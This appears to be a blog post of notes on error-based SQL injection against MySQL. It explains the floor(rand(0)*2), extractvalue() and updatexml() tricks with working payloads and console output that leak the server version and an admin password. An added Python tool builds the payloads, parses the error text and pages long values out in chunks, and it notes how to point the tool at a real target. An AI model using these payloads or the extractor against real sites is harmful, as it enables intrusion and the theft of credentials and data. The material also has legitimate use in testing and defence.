Posting some old notes. When MySQL fails to execute a statement it raises an error message, and PHP+MySQL sites often print that error straight onto the page, so the three techniques below can be used to make the error text carry the data we want.

Test environment:
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+
mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+
mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()

Payloads of the following shapes can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));

Why this errors: rand(0) is seeded, so floor(rand(0)*2) always produces the same sequence (0, 1, 1, 0, 1, 1, ...). When GROUP BY fills its temporary table it evaluates the group key once to look it up and, if the key is not there yet, evaluates it again when inserting the row. With that sequence the first row looks up key 0, misses, and is stored under key 1; the second row looks up key 1 and hits; the third row looks up key 0, misses, and tries to insert key 1 again, which is the duplicate. The grouped source therefore needs at least three rows, which is why the first form groups over information_schema.tables and the second unions three constant rows.
Example:

First the normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement forces the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
The MySQL version is leaked inside the duplicate key (the trailing 1 is the floor(rand(0)*2) value, not part of the data). To read other data, replace version() with the subquery you want. For example, to read the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue

Test payload:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

The 0x5c (backslash) prefix is what makes the second argument an invalid XPath expression; a bare value such as admin888 is a valid node name and produces no error at all. Note also that the error text shows at most 32 characters of the expression, so longer values (hashes, for instance) have to be read in pieces with mid() or substr().

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml

Test payload:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test (the same 32-character limit on the error text applies here):

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
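The following added Python example (not code from the original note) turns the three techniques into reusable payload builders and error parsers, and handles the case the note's 8-character password hides: a value longer than the 32 characters an XPath error can show, read in 31-character windows with mid(). Table and column names are the note's test schema; fake_oracle is a constructed in-memory stand-in for a PHP+MySQL page that echoes the database error, and the values in FAKE_ROWS are constructed, so the script runs offline. Against a real target, fake_oracle would be replaced by a function that sends the payload and returns the error text found in the response.

```python
# Added example, not code from the original note: payload builders and error
# parsers for the floor(), extractvalue() and updatexml() techniques, plus paging
# for the 32-character limit on the XPath error text. Table/column names are the
# note's test schema; fake_oracle and FAKE_ROWS are constructed stand-ins for a
# PHP+MySQL page that echoes the error, so everything runs offline.
import re

XPATH_LIMIT = 32                    # ERROR 1105 shows at most 32 chars of the XPath string
MARKER = "~"                        # 0x7e: never valid XPath, so the error is guaranteed
CHUNK = XPATH_LIMIT - len(MARKER)   # data characters that fit beside the marker

DUP_RE = re.compile(r"Duplicate entry '(.*)' for key 'group_key'")
XPATH_RE = re.compile(r"XPATH syntax error: '(.*)'")


def floor_payload(subquery):
    """floor(rand(0)*2) form; information_schema.tables supplies the >= 3 rows it needs."""
    return (f"and (select 1 from (select count(*),concat(({subquery}),floor(rand(0)*2))x "
            f"from information_schema.tables group by x)a)")


def extractvalue_payload(subquery, pos=1):
    """ExtractValue form; mid() selects the CHUNK-character window starting at pos."""
    return f"and extractvalue(1, concat(0x7e, mid(({subquery}),{pos},{CHUNK})))"


def updatexml_payload(subquery, pos=1):
    """UpdateXml form with the same window (the note's 0x5e24 marker replaced by 0x7e)."""
    return f"and 1=(updatexml(1, concat(0x7e, mid(({subquery}),{pos},{CHUNK}), 0x7e), 1))"


def parse_floor_error(msg):
    """'admin8881' -> 'admin888': the trailing 0/1 comes from floor(rand(0)*2), not the data."""
    m = DUP_RE.search(msg or "")
    return m.group(1)[:-1] if m else None


def parse_xpath_error(msg):
    """'~admin888' or '~admin888~' -> 'admin888' (assumes the data itself does not end in ~)."""
    m = XPATH_RE.search(msg or "")
    return m.group(1).strip(MARKER) if m else None


def extract_paged(oracle, subquery, builder=extractvalue_payload):
    """Read a value longer than CHUNK characters by sliding mid() across it."""
    out, pos = "", 1
    while True:
        chunk = parse_xpath_error(oracle(builder(subquery, pos)))
        if not chunk:
            return out
        out += chunk
        if len(chunk) < CHUNK:      # a short window means the end of the value
            return out
        pos += CHUNK


# --- constructed stand-in for the target ---------------------------------
FAKE_ROWS = {                       # constructed values, not real credentials
    "select pass from admin limit 1": "admin888",
    "select pass from admin where id = 2": "9b1c5f0e2d7a4c6b8e3f1a2d4c6e8b0f1a3c5e7d",
    "select version()": "5.1.33-community-log",
}
MID_RE = re.compile(r"mid\(\((.+?)\),(\d+),(\d+)\)")
FLOOR_RE = re.compile(r"concat\(\((.+?)\),floor\(rand\(0\)\*2\)\)")


def fake_oracle(payload):
    """Returns the error text a MySQL 5.1 server with the note's schema would echo."""
    m = MID_RE.search(payload)
    if m:
        value = FAKE_ROWS[m.group(1)]
        pos, n = int(m.group(2)), int(m.group(3))
        tail = MARKER if "updatexml" in payload else ""
        shown = (MARKER + value[pos - 1:pos - 1 + n] + tail)[:XPATH_LIMIT]
        return f"ERROR 1105 (HY000): XPATH syntax error: '{shown}'"
    m = FLOOR_RE.search(payload)
    if m:   # third GROUP BY row collides on <value>1 (rand(0) sequence 0,1,1)
        return f"ERROR 1062 (23000): Duplicate entry '{FAKE_ROWS[m.group(1)]}1' for key 'group_key'"
    return None


if __name__ == "__main__":
    print(parse_floor_error(fake_oracle(floor_payload("select pass from admin limit 1"))))
    print(extract_paged(fake_oracle, "select pass from admin where id = 2"))
    print(extract_paged(fake_oracle, "select pass from admin where id = 2", updatexml_payload))
```

The paging loop stops on the first window shorter than 31 characters (or an empty one), so an exact multiple of 31 costs one extra request rather than an infinite loop. The same loop works for updatexml(), whose trailing marker is simply cut off by the 32-character limit.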
Thanks all, and thanks to the foreign guys.